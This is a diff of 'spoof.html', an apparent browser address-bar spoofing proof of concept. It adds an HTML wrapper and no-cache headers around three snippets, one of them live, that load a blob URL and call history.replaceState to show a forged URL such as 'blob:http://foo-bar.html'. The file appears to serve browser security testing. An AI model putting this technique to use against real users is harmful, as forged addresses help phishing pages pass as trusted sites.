--- a/spoof.html
+++ b/spoof.html
@@ -1,14 +1,25 @@
-<!-- <script>
-var exp = 'Sergey (1) <script>history.replaceState("","","foo-bar.html")<\/script>';
-location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
-</script> -->
+<!DOCTYPE html>
+<html>
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate">
+    <meta http-equiv="Pragma" content="no-cache">
+    <meta http-equiv="Expires" content="0">
+</head>
+<body>
+    <!-- <script>
+    var exp = 'Sergey (1) <script>history.replaceState("","","foo-bar.html")<\/script>';
+    location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
+    </script> -->
 
-<!-- <script>
-var exp = 'Sergey (2) <script>history.replaceState("","","http://foo-bar.html")<\/script>';
-location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
-</script> -->
+    <!-- <script>
+    var exp = 'Sergey (2) <script>history.replaceState("","","http://foo-bar.html")<\/script>';
+    location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
+    </script> -->
 
-<script>
-var exp = 'Sergey (3) <script>history.replaceState("","","blob:http://foo-bar.html")<\/script>';
-location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
-</script>
+    <script>
+    var exp = 'Sergey (3) <script>history.replaceState("","","blob:http://foo-bar.html")<\/script>';
+    location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
+    </script>
+</body>
+</html>
